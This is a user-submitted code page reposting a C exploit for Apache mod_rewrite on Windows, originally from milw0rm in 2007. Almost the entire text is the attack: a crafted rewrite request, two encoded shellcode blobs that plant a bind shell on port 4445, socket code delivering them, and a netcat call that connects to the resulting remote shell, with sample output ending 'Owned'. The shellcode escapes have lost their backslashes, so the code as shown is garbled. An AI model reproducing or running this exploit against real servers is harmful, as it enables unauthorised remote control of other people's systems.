Ask Question

Name:
Title:
Your Question:

Answer Question

Name:
Your Answer:
User Submitted Source Code!


Description:
  m
Language: C/C++
Code:
/*
apache mod rewrite exploit (win32)

By: fabio/b0x (oc-192, old CoTS member)

Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded

Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
      original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also
      was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/

Usage: ./apache hostname rewrite_path

Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard

Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:Program FilesApache GroupApache2>exit
exit
[+]Owned
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 80 
#define PORT2 4444
#define MAXDATASIZE 1024
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
char shellcode[]= 
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x48x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41"
"x58x50x30x42x30x41x6bx41x41x51x41x32x41x41x32x42"
"x42x42x30x42x41x58x38x41x42x50x75x7ax49x4bx58x56"
"x36x73x30x43x30x75x50x70x53x66x35x70x56x31x47x4c"
"x4bx50x6cx44x64x55x48x6cx4bx73x75x75x6cx4cx4bx61"
"x44x73x35x63x48x35x51x4bx5ax6cx4bx50x4ax37x68x6c"
"x4bx42x7ax77x50x37x71x4ax4bx6bx53x44x72x30x49x6e"
"x6bx44x74x6ex6bx56x61x68x6ex54x71x39x6fx6bx4cx70"
"x31x4bx70x6cx6cx67x48x6bx50x54x34x53x37x6bx71x68"
"x4fx44x4dx73x31x78x47x38x6bx38x72x45x6bx73x4cx31"
"x34x46x74x52x55x6bx51x6cx4bx63x6ax65x74x56x61x7a"
"x4bx32x46x4cx4bx76x6cx70x4bx4ex6bx30x5ax75x4cx67"
"x71x5ax4bx6ex6bx74x44x4ex6bx57x71x6bx58x68x6bx76"
"x62x50x31x4bx70x33x6fx53x6ex31x4dx63x6bx4bx72x65"
"x58x55x50x61x4ex31x7ax36x50x42x79x70x64x4ex6bx74"
"x59x6ex6bx43x6bx44x4cx4cx4bx51x4bx77x6cx4cx4bx35"
"x4bx6ex6bx31x4bx74x48x73x63x63x58x6cx4ex70x4ex44"
"x4ex78x6cx79x6fx4bx66x4dx59x6fx37x4bx31x78x6cx33"
"x30x77x71x73x30x47x70x36x37x53x66x51x43x4dx59x69"
"x75x39x78x56x47x57x70x37x70x37x70x6ex70x45x51x33"
"x30x37x70x4cx76x72x39x55x48x7ax47x6dx74x45x49x54"
"x30x4dx39x38x65x77x39x4bx36x50x49x6cx64x35x4ax52"
"x50x4fx37x6cx64x4cx6dx76x4ex4dx39x4bx69x45x59x49"
"x65x4ex4dx78x4bx4ax4dx6bx4cx77x4bx31x47x50x53x74"
"x72x61x4fx46x53x67x42x57x70x61x4bx6cx4dx42x6bx75"
"x70x70x51x6bx4fx7ax77x4bx39x4bx6fx4fx79x4fx33x4e"
"x6dx71x65x52x34x53x5ax53x37x30x59x50x51x66x33x4b"
"x4fx55x64x4cx4fx6bx4fx66x35x43x34x50x59x6ex69x47"
"x74x6cx4ex6ax42x58x72x54x6bx64x67x72x74x39x6fx76"
"x57x6bx4fx50x55x44x70x30x31x4bx70x50x50x30x50x50"
"x50x32x70x77x30x46x30x53x70x70x50x49x6fx63x65x66"
"x4cx4bx39x4fx37x30x31x6bx6bx33x63x71x43x42x48x54"
"x42x63x30x76x71x63x6cx4cx49x6dx30x52x4ax32x30x32"
"x70x36x37x59x6fx52x75x71x34x50x53x70x57x4bx4fx72"
"x75x44x68x61x43x62x74x33x67x59x6fx63x65x67x50x4c"
"x49x38x47x6dx51x5ax4cx53x30x36x70x53x30x33x30x4e"
"x69x4bx53x53x5ax43x30x72x48x53x30x34x50x33x30x33"
"x30x50x53x76x37x6bx4fx36x35x74x58x6ex61x4ax4cx67"
"x70x35x54x33x30x63x30x49x6fx78x53x41";


char finish[]= "HTTP/1.0rnHost: ";

char payload2[]=
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x18"
"xd9x03x3ax83xebxfcxe2xf4xe4xb3xe8x77xf0x20xfcxc5"
"xe7xb9x88x56x3cxfdx88x7fx24x52x7fx3fx60xd8xecxb1"
"x57xc1x88x65x38xd8xe8x73x93xedx88x3bxf6xe8xc3xa3"
"xb4x5dxc3x4ex1fx18xc9x37x19x1bxe8xcex23x8dx27x12"
"x6dx3cx88x65x3cxd8xe8x5cx93xd5x48xb1x47xc5x02xd1"
"x1bxf5x88xb3x74xfdx1fx5bxdbxe8xd8x5ex93x9ax33xb1"
"x58xd5x88x4ax04x74x88x7ax10x87x6bxb4x56xd7xefx6a"
"xe7x0fx65x69x7exb1x30x08x70xaex70x08x47x8dxfcxea"
"x70x12xeexc6x23x89xfcxecx47x50xe6x5cx99x34x0bx38"
"x4dxb3x01xc5xc8xb1xdax33xedx74x54xc5xcex8ax50x69"
"x4bx8ax40x69x5bx8axfcxeax7exb1x12x67x7ex8ax8axdb"
"x8dxb1xa7x20x68x1ex54xc5xcexb3x13x6bx4dx26xd3x52"
"xbcx74x2dxd3x4fx26xd5x69x4dx26xd3x52xfdx90x85x73"
"x4fx26xd5x6ax4cx8dx56xc5xc8x4ax6bxddx61x1fx7ax6d"
"xe7x0fx56xc5xc8xbfx69x5ex7exb1x60x57x91x3cx69x6a"
"x41xf0xcfxb3xffxb3x47xb3xfaxe8xc3xc9xb2x27x41x17"
"xe6x9bx2fxa9x95xa3x3bx91xb3x72x6bx48xe6x6ax15xc5"
"x6dx9dxfcxecx43x8ex51x6bx49x88x69x3bx49x88x56x6b"
"xe7x09x6bx97xc1xdcxcdx69xe7x0fx69xc5xe7xeexfcxea"
"x93x8exffxb9xdcxbdxfcxecx4ax26xd3x52xe8x53x07x65"
"x4bx26xd5xc5xc8xd9x03x3a";

int main(int argc, char *argv[])
{
    int sockfd, numbytes;  
    char buf[MAXDATASIZE];
    struct hostent *he;
    struct sockaddr_in their_addr;
    printf("  Exploit: apache mod rewrite exploit (win32)n"
           "       By: fabio/b0x (oc-192, old CoTS member)n"
           "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguardn"
           );
    if (argc != 3) {
        printf("    Usage: ./apache hostname rewrite_pathn");
        exit(1);
    }
    printf("n[+]Preparing payloadn");

    char payload[748];
    sprintf(payload,"GET /%s%s%s%s%srnrn�",argv[2],get,shellcode,finish,argv[1]);

    printf("[+]Connecting...n");
    if ((he=gethostbyname(argv[1])) == NULL) {
        printf("[-]Cannot resolv hostname...n");
        exit(1);
    }
    if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-]Socket error...n");
        exit(1);
    }

    their_addr.sin_family = AF_INET;   
    their_addr.sin_port = htons(PORT);  
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(their_addr.sin_zero, '�', sizeof their_addr.sin_zero);
    if (connect(sockfd, (struct sockaddr *)&their_addr,
                                          sizeof(struct sockaddr)) == -1) {
        printf("[-]Unable to connectn");
        exit(1);
    }
   printf("[+]Connectedn[+]Sending...n");
   if (send(sockfd, payload, strlen(payload), 0) == -1){
    printf("[-]Unable to sendn");
    exit(1);
   }
   printf("[+]Sentn");
   close(sockfd);
   printf("[+]Starting second stage...n");
   sleep(3);
    printf("[+]Connecting...n");
    if ((he=gethostbyname(argv[1])) == NULL) { 
        printf("[-]Cannot resolv hostname...n");
        exit(1);
    }
    if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-]Socket error...n");
        exit(1);
    }

    their_addr.sin_family = AF_INET;   
    their_addr.sin_port = htons(PORT2);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(their_addr.sin_zero, '�', sizeof their_addr.sin_zero);
    if (connect(sockfd, (struct sockaddr *)&their_addr,
                                          sizeof(struct sockaddr)) == -1) {
        printf("[-]Unable to connectn");
        exit(1);
    }
   printf("[+]Connectedn[+]Sending...n");
   if (send(sockfd, payload2, strlen(payload2), 0) == -1){
    printf("[-]Unable to sendn");
    exit(1);
   }
   printf("[+]Sentn[+]Connecting to shelln");
   close(sockfd);


   sleep(3);
   int exec;
   char what[1024];
   sprintf(what," nc -w 10 %s 4445",argv[1]);
   exec=system(what);
   if (exec!=0){
    printf("[-]Not hackedn");
   } else {
    printf("[+]Ownedn");
   }
   exit(1);


// milw0rm.com [2007-05-26]

          
Comments: